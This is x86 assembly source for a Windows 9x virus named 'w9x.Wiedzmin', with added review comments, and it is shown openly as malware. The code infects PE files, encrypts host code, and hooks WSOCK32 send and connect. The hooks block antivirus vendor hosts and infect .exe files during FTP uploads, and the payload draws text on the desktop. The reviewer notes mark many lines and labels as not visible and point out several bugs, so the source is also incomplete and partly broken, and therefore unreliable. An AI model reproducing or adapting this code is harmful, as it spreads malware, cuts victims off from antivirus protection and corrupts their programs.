call dword ptr [ebp+_GPA]
inc esi
cmp byte ptr [esi],0
jne check_a
inc esi
cmp byte ptr [esi],77h ; 77h: the following names come from USER32
je change_ll
cmp byte ptr [esi],69h ; 69h: end of list
je @go_pay
jmp @find_a
change_ll: inc esi
lea ebx,[ebp+user32]
jmp change_l
push 1 ; SM_CYSCREEN
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_y],eax
push 0 ; SM_CXSCREEN
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_x],eax
call c_font
lea esi,logo ; NOTE(review): absolute, not [ebp+logo] - only valid at the link address
xor ebx,ebx ; colour index
; l (label not visible): one character per iteration, never exits.
call dword ptr [ebp+_GetDesktopWindow] ;user
mov dword ptr [ebp+wh],eax
push dword ptr [ebp+wh]
call dword ptr [ebp+_GetWindowDC] ;user
mov dword ptr [ebp+hdc],eax
call draww
push dword ptr [ebp+hdc]
push dword ptr [ebp+wh]
call dword ptr [ebp+_ReleaseDC] ;user
jmp l
; draww (label not visible): write the next character of `logo` at
; (p_x,p_y) in the next colour, then advance across the screen, wrapping
; to the next row at the right edge and back to the top at the bottom.
; Sleep(50) between characters. The `ret` is not visible.
xor eax,eax
lea edi,[ebp+jed]
; Copy the next logo character into the one-character string `jed`;
; at the terminating NUL restart from the beginning of `logo`
; (lodsb/stosb and the loop labels are not visible).
cmp al,0
jne @wypisz
lea esi,[ebp+logo]
lea edi,[ebp+jed]
cmp al,'i'
jne @dik
add dword ptr [ebp+p_x],6 ; narrower glyph: nudge right
push dword ptr [ebp+font]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SelectObject] ;gdi
push 0 ; NOTE(review): 0 is not a valid bkMode (TRANSPARENT is 1) - verify intent
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetBkMode] ;gdi
mov eax,dword ptr [ebp+color+ebx] ; cycle through the four colours
add ebx,4
cmp ebx,4*4
jl @n1
xor ebx,ebx
push eax
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetTextColor] ;gdi
push 1 ; one character
lea eax,[ebp+jed]
push eax
push dword ptr [ebp+p_y]
push dword ptr [ebp+p_x]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_TextOutA] ;gdi
mov eax,dword ptr [ebp+screen_y]
cmp dword ptr [ebp+p_y],eax
jae chang_g ; past the bottom: back to the top row
mov eax,dword ptr [ebp+screen_x]
add dword ptr [ebp+p_x],13 ; next column
cmp dword ptr [ebp+p_x],eax
jle spp
mov dword ptr [ebp+p_x],0 ; right edge: wrap to the next row
add dword ptr [ebp+p_y],15
jmp spp
chang_g: mov dword ptr [ebp+p_y],0
push 50
call dword ptr [ebp+_Sleep]
; c_font (label not visible): font = CreateFontA(9, 9, 0 x 11, "Verdana").
; NOTE(review): `push offset famil` and `mov [font],eax` are absolute
; rather than ebp-relative, so this only works at the link address
; (first generation); in an infected host they address the wrong memory.
push offset famil ; lpszFace
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push 9 ; nWidth
push 9 ; nHeight
call dword ptr [ebp+_CreateFontA] ;gdi
mov [font],eax
; Payload import names, in the same order as the @GDI_APIZA dword table.
; 77h switches the lookup to USER32; 69h ends the list.
@GDI_APIZ: db "CreateFontA",0
db "TextOutA",0
db "SetBkMode",0
db "SetTextColor",0
db "SelectObject",0
db 77h
db "GetSystemMetrics",0 ;user32 part X-D
db "GetDesktopWindow",0
db "GetWindowDC",0
db "ReleaseDC",0
db 69h
;Handle this sucker ;]
; @crypt_host (label not visible): layer 2. Find the section holding the
; entry point - the first header whose VirtualAddress+VirtualSize lies
; above the entry RVA (only the upper bound is checked) - make it
; writable, and XOR its contents from the entry point onward with the
; low byte of key_next, stopping at a run of five zero bytes.
;push dword ptr [ebp+key_next]
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,0h ; start at the first section header
add esi,ecx ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = number of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to first section
mov ecx,[edi+28h] ; ecx = AddressOfEntryPoint
; search_it (label not visible)
mov ebx,dword ptr [esi+0ch]
add ebx,dword ptr [esi+08h] ; ebx = VirtualAddress + VirtualSize
inc eax
cmp ecx,ebx
jb sfound
dec eax
jz @e_error ; no section found
add esi,28h
jmp search_it
; sfound (label not visible)
test dword ptr [esi+24h],10000000h ; refuse IMAGE_SCN_MEM_SHARED sections
jnz @e_error
or dword ptr [esi+24h],0A0000020h ; WRITE|EXECUTE|CNT_CODE: the stub decrypts this section in place
cmp dword ptr [esi],'xet.' ; ".text"
je _01
cmp dword ptr [esi],'EDOC' ; "CODE"
je _01
mov dword ptr [ebp+help_virus],1 ; any other name: helper-stub path
push eax
mov edx,ecx
sub edx,dword ptr [esi+0ch] ; entry RVA - section VirtualAddress
add edx,[esi+014h] ; + PointerToRawData -> raw offset of the entry point
mov dword ptr [ebp+e_where],edx
push edx
mov edx,[esi+010h]
mov dword ptr [ebp+e_bytes],edx ; SizeOfRawData
pop edx
add edx,dword ptr [ebp+fMapReal] ;WHERE TO CRYPT!
; NOTE(review): the count is the full SizeOfRawData but encryption starts
; at the entry point's offset, so unless the zero-run check below stops
; it, it runs (entry - VirtualAddress) bytes past the section end.
mov ecx,[esi+10h]
mov dword ptr [ebp+e_god],0
mov dword ptr [ebp+firstk],1h
lea edi,[ebp+key_next]
call @GGEN_KEY ; key2 = GetTickCount mod 55h
call @combine_key
mov eax,dword ptr [ebp+key_next]
mov dword ptr [ebp+firstk],0
push esi
mov eax,dword ptr [ebp+key_next]
xor ebx,ebx
; @loop_it (label not visible): stop at five consecutive zero bytes,
; otherwise XOR one byte with the low key byte.
cmp byte ptr [edx],00h
jne @go_
cmp byte ptr [edx+1],00h
jne @go_
cmp byte ptr [edx+2],00h
jne @go_
cmp byte ptr [edx+3],00h
jne @go_
cmp byte ptr [edx+4],00h
je @crypted
xor byte ptr [edx],al
inc edx
loop @loop_it
jmp @e_out
; @crypted: record how many bytes were actually encrypted.
pop esi
mov eax,dword ptr [ebp+e_bytes]
sub eax,ecx
mov dword ptr [ebp+e_bytes],eax
jmp @e_out
pop eax
cmp dword ptr [ebp+help_virus],1
je @mute_other_virus
mov eax,dword ptr [ebp+key2]
add eax,dword ptr [ebp+key]
lea edi,[ebp+key_main] ; key_main = key + key2 (the storing `stosd` is presumably lost)
; @uncrypt / helper stub (start label not visible). Planted into the host's
; last section when the entry section is not named .text/CODE: it
; decrypts e_bytes bytes in place at ImageBase+hosteip with the low byte
; of key_next and jumps to the original entry point. The variables below
; travel with the stub (helper = @uncrypt..@helper_end).
call delta_e
delta_e: pop ebp
sub ebp,offset delta_e
mov edx,dword ptr [ebp+imagebase]
add edx,dword ptr [ebp+hosteip] ; assumes load at the preferred ImageBase
mov ecx,dword ptr [ebp+e_bytes]
xor ebx,ebx
mov eax,[ebp+key_next]
; @lloop_it (label not visible): writes to code pages - relies on the
; WRITE flag @crypt_host set on the section.
xor byte ptr [edx],al
inc edx
loop @lloop_it
cmp dword ptr [ebp+czy_je],0 ; 1 once the stub has been planted in a host
jne @helper_endd
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
czy_je dd 0
e_bytes dd 0
e_where dd 0
e_god dd 0
hosteip dd 0
imagebase dd 0
key_next dd 0
@helper_end: nop
; Helper-stub planting (entered from @infect when help_virus=1): append
; the @uncrypt stub to the last section, point the entry point at it,
; grow the section/image, extend the file and close the handles.
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = number of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
; NOTE(review): unlike @infect, the whole aligned file size (fSize+helper)
; is written as the last section's SizeOfRawData/VirtualSize instead of
; the section size plus the stub - looks like a bug; the resulting
; SizeOfImage is correspondingly oversized.
mov eax,dword ptr [ebp+fSize]
add eax,helper
mov ecx,[edi+3Ch] ; FileAlignment
call Align_
mov [esi+10h],eax
mov [esi+08h],eax
pop edx
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edi+50h],eax ; SizeOfImage
lea esi,[ebp+@uncrypt] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,helper
mov dword ptr [ebp+czy_je],1 ; mark the stub as planted before copying it
rep movsb
push dword ptr [ebp+offset fMapReal]
call dword ptr [ebp+_UnmapViewOfFile]
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
mov ecx,dword ptr [ebp+fSize]
add ecx,helper
call @zostaf ; set the final file length
push dword ptr [ebp+fHnd] ; fHnd is never assigned in the visible code (see @infect)
call dword ptr [ebp+_CloseHandle]
;Wsock32 hooker!!!
; @wsockz (label not visible):
; 1) copy <system>\WSOCK32.dll to <windows>\WZZOCK32.dll;
; 2) infect the copy in hook mode (go_wsock=1): @infect appends the hook,
;    then @go_export patches the send/connect export entries;
; 3) queue "[rename] <system>\WSOCK32.dll=<windows>\WZZOCK32.dll" in
;    WININIT.INI so Win9x swaps the DLL in at the next reboot.
mov eax,dword ptr [ebp+_GetSystemDirectoryA] ; (unused loads)
mov ebx,dword ptr [ebp+_GPA]
push 260
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_GetSystemDirectoryA]
lea eax,[ebp+offset winDIRr]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
lea edi,[ebp+sysDIR]
lea esi,[ebp+wsock]
call strcat ; sysDIR += "\WSOCK32.dll" (unbounded append into a 260-byte buffer)
lea edi,[ebp+winDIRr]
lea esi,[ebp+nowe]
call strcat ; winDIRr += "\WZZOCK32.dll"
push 1 ; bFailIfExists
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_CopyFileA]
cmp eax,0
je bye ; copy exists or failed: nothing to do
lea edi,[ebp+finddata.cFileName]
lea esi,[ebp+winDIRr]
call strcat ; NOTE(review): appends to whatever cFileName holds rather than replacing it - TODO confirm the buffer is empty here
mov dword ptr [ebp+go_wsock],1
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect ; edx = -1 on failure
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
cmp edx,-1
je bye
mov dword ptr [ebp+capis],0 ; 0 = "send", then 1 = "connect"
mov eax,dword ptr [ebp+fMapReal]
mov dword ptr [ebp+wsock_h],eax ; the export walk runs on the file mapping
call @go_export ; patch both EAT entries
call _God ; @infect's cleanup tail: unmap/close
mov dword ptr [ebp+go_wsock],0
; WritePrivateProfileStringA("rename", sysDIR, winDIRr, WININIT)
lea eax,[ebp+WININIT]
push eax
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
lea eax,[ebp+rename]
push eax
call dword ptr [ebp+_WritePrivateProfileStringA]
bye: ret
;STRCAT: smaller and faster (I think - not optimized with repz)
;edi - base buffer
;esi - string to append
; strcat (label not visible): find the NUL of edi, then copy esi there.
; The lodsb/stosb/ret of the copy loop are not visible. No length bound:
; every caller passes fixed 260/512-byte buffers, so long paths overrun.
push esi
mov esi,edi
sstrcat: lodsb
cmp al,0
jne sstrcat
dec esi ; back onto the NUL
mov edi,esi
pop esi
cmp al,0
je le
jmp cat_it
;Files with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
; @bad_name (label not visible): edi = 1 if the first character of
; finddata.cFileName is one of those letters, else 0. The `lodsb` and the
; `ret` before error_a are not visible; as shown every path reaches
; `inc edi`.
xor edi,edi
lea esi,[ebp+finddata.cFileName]
cmp al,'a'
je error_a
cmp al,'A'
je error_a
cmp al,'E'
je error_a
cmp al,'e'
je error_a
cmp al,'v'
je error_a
cmp al,'V'
je error_a
error_a: inc edi
; @GGEN_KEY (label not visible): key2 (and key, when firstk=0) =
; GetTickCount mod 55h. Only 85 possible values, and every XOR loop uses
; just the low byte, so the "encryption" is a single-byte XOR with an
; 85-value keyspace - trivially brute-forced. No cdq/xor edx,edx is
; visible before the idiv (a lost single-token line, or a latent #DE).
cmp dword ptr [ebp+firstk],1
jne @go__
mov ebx,40h
mov dword ptr [ebp+key2],0h
mov dword ptr [ebp+offset key],0000000h
mov ebx,55h
call dword ptr [ebp+_GetTickCount]
idiv ebx ; edx = remainder; a much simpler random scheme than T2000/Immortal Riot's
cmp edx,ebx ; (result unused)
cmp dword ptr [ebp+firstk],1
je @go___
mov dword ptr [ebp+offset key],edx
@go___: mov dword ptr [ebp+offset key2],edx
mov ecx,edx
; Try_crypt (label not visible): layer 3 - add the key byte (cl) to each
; byte of the data strings, skipping NULs, until the 07h terminator.
; The stosb after _next is not visible. Try_uncrypt below is the inverse.
lodsb ; read one byte into AL
cmp al,0
je _zero
cmp al,07h
je _retprog
_next: add al,cl
jmp Try_crypt
_zero: inc edi
jmp Try_crypt
_retprog: ret
; Try_uncrypt (label not visible): undo Try_crypt with the same key
; (subtract cl from each non-NUL byte until 07h). lodsb/stosb not visible.
mov ecx,dword ptr [ebp+offset key]
cmp al,0h
je _zero0
cmp al,07h
je ret0
_next0: sub al,cl
jmp Try_uncrypt
_zero0: inc edi
jmp Try_uncrypt
ret0: ret
; hooked_connect(s, name, namelen) - the entry label and the pushad that
; the [esp+40] offset implies are not visible. Fails connections whose
; destination IPv4 address matches one of the /24 prefixes in DENIED.
call get_delta ; eax = load delta of the hook
mov edx,[esp+(10*4)] ; EDX = sockaddr (2nd arg above 8 pushad regs + return address)
mov ecx,[edx+(2*2)] ; sin_addr (sockaddr_in+4)
shl ecx,8 ; drop the last octet: only the /24 prefix is compared
lea esi,[eax+DENIED]
mov edi,eax ;save EAX in EDI
scan_denied: lodsd
dec esi ; entries are 3 bytes; lodsd read 4
shl eax,8 ; keep three octets; the 0,0,0 terminator becomes 0
jz TOC
cmp ecx,eax
jne scan_denied
; Denied. NOTE(review): no error code is pushed before this call in the
; visible lines (the send hook pushes WSAECONNRESET) - either a push was
; lost or WSASetLastError gets whatever is on the stack.
call dword ptr [edi+_WSASetLastError]
push -1
pop eax ; SOCKET_ERROR
jmp out_c
TOC: ;tHe oRgInal coNneCt ;]
; NOTE(review): eax is 0 here (the jz above), so [eax+a_connect] reads
; the link-time address of a_connect instead of [edi+a_connect]; the
; argument offsets also assume the pushad frame is already gone. Looks
; like a bug or lost lines - verify against the full source.
push [esp+0Ch] ;int namelen
push [esp+4+8] ;const struct sockaddr FAR* name
push [esp+8+4] ;SOCKET s
call dword ptr [eax+a_connect] ;call orginal connect!!!
out_c: retn 0Ch
;//////////////////////////////////////////////hooked send///////////////////////////////////////
; hooked_send(s, buf, len, flags) - entry label/pushad not visible.
; If the buffer starts with "STOR" (FTP upload) and the argument ends in
; .exe/.EXE, run the dropped copy (santa) with "<cwd>\<name>" so the
; file is infected before it is sent; otherwise pass through to send.
call get_delta
mov edi,eax ; edi = hook delta
mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf)
mov eax,[ebx] ; reads 4 bytes regardless of len
cmp eax,'ROTS' ;FTP: Storing a file ? ;)
je _ftp_store
popad ;tHe oRgInaL sEnd
; NOTE(review): popad restores the caller's eax, so [eax+a_send] below
; no longer points at the hook's data - looks like a bug (should be
; delta-relative). Verify against the full source.
push [esp+10h] ;int flags
push [esp+4+0Ch] ;int len
push [esp+8+8] ;const char FAR * buf
push [esp+0Ch+4] ;SOCKET s
call dword ptr [eax+a_send] ;call orginal send!!!
out_s: retn 10h
_ftp_store: ;yeah! infect on tha fly
mov edx,[esp+28h] ;point to name =]
add edx,5 ;skip STOR and one space (5 bytes)
mov esi,[esp+28h]
; @loop (label not visible): scan for the first '.' (lodsb not visible)
cmp al,'.' ;find first dot
jne @loop
dec esi
mov esi,[esi] ; four bytes from the '.'
cmp esi,'EXE.'
je try_it
cmp esi,'exe.'
je try_it
jmp TOS
; try_it: copy the name up to CR into buff (110 bytes). The visible loop
; has no length bound (lodsb/stosb not visible): a long STOR argument
; overruns buff and the buffers after it.
mov ecx,edi ; ecx = hook delta
lea edi,[ecx+offset buff]
mov esi,edx
xor edx,edx ; edx = name length
cmp al,0dh
je _end
inc edx
jmp _l
mov edi,edx
lea edx,[ecx+offset buff]
lea ebx,[ecx+offset inf_prog]
push ecx ;preserve ecx
push ebx
push 260
call dword ptr [ecx+gcd] ; GetCurrentDirectoryA(260, inf_prog)
;ftp clients use that to locate the file being uploaded
pop ecx ;load ecx
mov eax,edi
xor ebx,ebx
lea esi,[ecx+offset inf_prog]
inc ebx
cmp al,0
jne _loop_1
lea edi,[ecx+offset inf_prog] ;append '\' to the path
add edi,ebx
dec edi
mov al,'\'
lea esi,[ecx+offset buff]
_l2: ; inline strcat, no bounds check (inf_prog is 260 bytes)
cmp al,0
je _skipp
jmp _l2
; inf_prog2 = santa + ' ' + inf_prog
lea esi,[ecx+offset santa]
lea edi,[ecx+offset inf_prog2]
cmp al,0
je _catt
jmp _cat
mov al,' '
lea esi,[ecx+offset inf_prog]
cmp al,0
je done
jmp _make_real
mov edi,ecx
push 1 ; SW_SHOWNORMAL
lea eax,[edi+offset inf_prog2]
push eax
call dword ptr [edi+wex] ; WinExec("<santa> <cwd>\<name>")
jmp TOS
reset_err: push WSAECONNRESET
call dword ptr [edi+_WSASetLastError]
push -1
pop eax
jmp out_s
; get_delta / @hookerdelta (labels and trailing `ret` not visible):
; eax = load delta of the hook.
call @hookerdelta
pop eax
sub eax,offset @hookerdelta
; Hook data. Lives inside the relocatable hook; filled in by the dropper
; before the hook is copied into the DLL.
a_send dd 0 ; original send
a_connect dd 0 ; original connect
msgg dd 0BFF44146h ; hard-coded Win9x-range absolute address; purpose not visible here
DO_WPISU: _WSASetLastError dd 0
wex dd 0 ; WinExec
gcd dd 0 ; GetCurrentDirectoryA
buff db 110 dup (0) ; upload file name taken from the STOR line
inf_prog2 db 260 dup (0) ; command line "<santa> <path>"
inf_prog db 260 dup (0) ; "<cwd>\<name>"
santa db 'C:\Program Files\deithwen.exe',0 ; dropped copy used for on-the-fly infection
;santa db 'C:\WINDOWS\CALC.EXE',0
;***********DENIED LIST*************************************************************************
;thx goez to T-2000/Immortal Riot ;]
; Three bytes per entry: the first three octets (/24) of AV-vendor hosts
; as of 2002. Fixed list, matched against sin_addr with the last octet
; dropped; 0,0,0 terminates.
DENIED: DB 161,069,003 ; nai.com
DB 216,122,008 ; avp.com
DB 195,170,248 ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
DB 193,247,150 ; avp.ch, metro.ch
DB 194,252,006 ; datafellows.com, f-secure.com
DB 195,112,025 ; drsolomon.com
DB 208,228,231 ; mcafee.com
DB 194,203,134 ; sophos.com
DB 146,145,148 ; norman.com
DB 206,204,003 ; pandasoftware.com
DB 193,004,210 ; complex.is
DB 203,037,250 ; leprechaun.com.au
DB 141,202,248 ; cai.com
DB 216,033,022 ; antivirus.com, trendmicro.com
DB 216,035,137 ; sarc.com
DB 216,086,104 ; virus.com
DB 212,029,228 ; invircible.com
DB 208,226,167 ; symantec.com
DB 207,227,040 ; grisoft.com
DB 194,105,193 ; drweb.ru
DB 000,000,000 ; end of table.
hook_end label byte
; Export names searched in the mapped WSOCK32 copy (hook mode).
A1 db 'send',0
A1s equ $-A1
A2 db 'connect',0
A2s equ $-A2
e_esi dd 0
APIS db 'GetProcAddress',0 ; the one kernel32 export resolved by hand
; Names resolved at start-up, in the same order as the APIListA table.
APIList: db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "SetFileAttributesA",0
db "SetFileTime",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "GetFileTime",0
db "GetFileSize",0
db "GetFileAttributesA",0
db "SetFileAttributesA",0
db "ReadFile",0
db "WriteFile",0
db "SetFilePointer",0
db "SetEndOfFile",0
db "CloseHandle",0
db "SetCurrentDirectoryA",0
db "GetWindowsDirectoryA",0
db "GetSystemDirectoryA",0
db "CopyFileA",0
db "ExitProcess",0
db "GetTickCount",0
db "GetCommandLineA",0
db "IsDebuggerPresent",0
db "OutputDebugStringA",0
db "WinExec",0
db "LoadLibraryA",0
db "GetModuleHandleA",0
db "Sleep",0
db "GetSystemTime",0
db "WritePrivateProfileStringA",0
db "VirtualAlloc",0
db "VirtualFree",0
db "GetCurrentDirectoryA",0,07h ;07h stops the looking up
msg dd 0BFF44146h ; hard-coded absolute address (same value as msgg in the hook); purpose not visible
key dd 0 ; GetTickCount mod 55h
;shit7 db "w.dll",0
marker db 'sru.exe',0 ; search mask: this build only touches files named sru.exe; the *.exe mask is commented out
;marker db '*.exe',0
; Layer 3 data: strings transformed by Try_crypt/Try_uncrypt, ending at 07h.
TO_CRYPT_DATA: to_ja: db 0ah,0dh
db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db "Æ Deithwen Addan Flared Again",0ah,0dh
db "Æ You have eyez, but u can't see",0ah,0dh
db "Æ You have earz, but u can't hear",0ah,0dh
db "Æ Wake up from unreal world before",0ah,0dh
db "Æ you drown in the Sea of Chaos.",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db 0ah,0dh,0
wsock db "\WSOCK32.dll",0 ; appended to the system directory; +1 skips the '\' for LoadLibraryA
nowe db "\WZZOCK32.dll",0 ; replacement copy placed in the Windows directory
sice9x db "\\.\SICE",0 ; SoftICE device name
sle db "WSASetLastError",0
user32 db "USER32.DLL",0
gdi32 db "GDI32.DLL",0
rename db "rename",0 ; WININIT.INI section name
jed db "X",0 ; one-character scratch string for TextOutA
famil db "Verdana",0
logo db ": w9x.WiEDZMiN has you :",0
deshit db "kfe",0,07h ; 07h ends the layer-3 data
; @crypt_my_body tail / @mutualisk (labels not visible): layer 1 writer.
; Emit GetTickCount mod 255 NOPs at edi (the file), XOR the body in place
; with key_main so the rep movsb writes the encrypted form, then call the
; main decryptor with edi='YUP!' to restore the body in memory.
; No cdq/xor edx,edx is visible before the idiv (a lost line, or a
; latent divide fault).
push ecx
call dword ptr [ebp+_GetTickCount]
mov ebx,255
idiv ebx
mov ecx,edx ; NOP count, 0..254
mov byte ptr [edi],90h ; NOP sled in front of the body; the only size variation between samples
inc edi
loop @mutualisk
pop ecx
; Encrypt @to_this..@loop_decryptt (same XOR as the decryptor). The
; decryptor code that precedes @to_this and key_main below are written
; unencrypted, so the key is recoverable from any infected file.
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE
xor byte ptr [edx],al
inc edx
loop @loop_decryptt
rep movsb ; write the (encrypted) body to the file
mov edi,'!PUY' ; tag: make the decryptor return instead of jumping to @to_this
call @main_decryptor
key_main dd 0 ; XOR key, stored in the clear next to the decryptor
;db 5 dup (90h)
; align dword
VirusEnd label byte
;=============================================Virtual data: not copied into the virus body=====================
; Scratch area (vvsize bytes). Space for it is reserved in the infected
; file, but the copy loop writes only virussize bytes.
HeapStart label byte
finddata WIN32_FIND_DATA <> ; find-data structure; cFileName is also reused as a path buffer
fileHandle dd 0 ; handle from CreateFileA (the only handle variable actually assigned)
fileAtrib dd 0 ; original attributes, restored after infection
licznik_b dd 0
; Resolved kernel32 imports, parallel to APIList.
APIListA: _FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_SetAttributesA dd 0
_SetFileTime dd 0
_CreateFileA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_GetFileTime dd 0
_GetFileSize dd 0
_GetFileAttributesA dd 0
_SetFileAttributesA dd 0
_ReadFile dd 0
_WriteFile dd 0
_SetFilePointer dd 0
_SetEndOfFile dd 0
_CloseHandle dd 0
_SetCurrentDirectoryA dd 0
_GetWindowsDirectoryA dd 0
_GetSystemDirectoryA dd 0
_CopyFileA dd 0
_ExitProcess dd 0
_GetTickCount dd 0
_GetCommandLineA dd 0
_IsDebuggerPresent dd 0
_OutputDebugStringA dd 0
_WinExec dd 0
_LoadLibraryA dd 0
_GetModuleHandleA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_WritePrivateProfileStringA dd 0
_VirtualAlloc dd 0
_VirtualFree dd 0
_GetCurrentDirectoryA dd 0
; Resolved payload imports, parallel to @GDI_APIZ.
@GDI_APIZA: _CreateFontA dd 0
_TextOutA dd 0
_SetBkMode dd 0
_SetTextColor dd 0
_SelectObject dd 0
_GetSystemMetrics dd 0
_GetDesktopWindow dd 0
_GetWindowDC dd 0
_ReleaseDC dd 0
; SYSTEMTIME for the payload date check.
SYSTEM_TIME: wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0
F1: dd 2 dup (?) ; FILETIMEs saved by GetFileTime
F2: dd 2 dup (?)
F3: dd 2 dup (?)
vbuf dd 0 ; VirtualAlloc buffer
help_virus dd 0 ; 1 = entry section not .text/CODE, use the helper stub
memory dd 0 ; grown, aligned file size
header dd 0
align dd 0 ; FileAlignment
_hostIP dd 0
_secAlign dd 0 ; SectionAlignment (saved, never read in the visible code)
newEIP dd 0 ; duplicate of NewEIP differing only in case
NewEIP dd 0
firstk dd 0
key2 dd 0
go_wsock dd 0 ; 1 while infecting the WSOCK32 copy in hook mode
wsock_h dd 0 ; file mapping of the WSOCK32 copy
moj_address dd 0 ; raw file offset of the appended body/hook
capis dd 0 ; which export name @go_export searches (5 / 0 / 1)
wsock_hh dd 0 ; LoadLibraryA handle of WSOCK32
NON dd 0 ;numbers of names
AOF dd 0 ;addr of Functions
AON dd 0 ;addr of Names
AOO dd 0 ;addr of Ordinals
IndexA dd 0
_GPA dd 0 ; GetProcAddress
fHnd dd 0 ; never assigned in the visible code; see @infect
fHndMap dd 0 ; CreateFileMappingA handle
fMapReal dd 0 ; MapViewOfFile base
fSize dd 0 ; original file size
my_seh dd 0
was_win dd 0 ; 1 once the search moved to the Windows directory
ic dd 0 ; infections in the current directory (stops at 7)
sHnd dd 0 ; FindFirstFileA handle
shitsize dd 0
oldDIR db 512 dup (?)
winDIR db 260 dup (?)
sysDIR db 260 dup (?) ; system dir + "\WSOCK32.dll" (no bounds check on the append)
winDIRr db 260 dup (?) ; windows dir + "\WZZOCK32.dll"
db 5 dup (?)
toHOST dd 0
; align dword
HeapEnd label byte
; First generation only (fakehost, label not visible): show a message
; box and exit. bodyy ends in " bytes" but the virussizee macro that
; would insert the size is not invoked in the visible lines. The pushes
; use absolute offsets (no ebp), so this only works at the link address.
titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
bodyy db "Elaine blath, Feainnewedd",0ah,0dh
db "Dearme aen a'caelme tedd",0ah,0dh
db "Eigean evelienn deireadh",0ah,0dh
db "Que'n esse, va en esseath",0ah,0dh
db "Feainnewedd, elaine blath!"
db 0ah,0dh
db " bytes",0
push 0h ; uType
push offset titlee ; lpCaption
push offset bodyy ; lpText
push 0h ; hWnd
call MessageBoxA
push 0h
call ExitProcess
endshit: ends
End v_start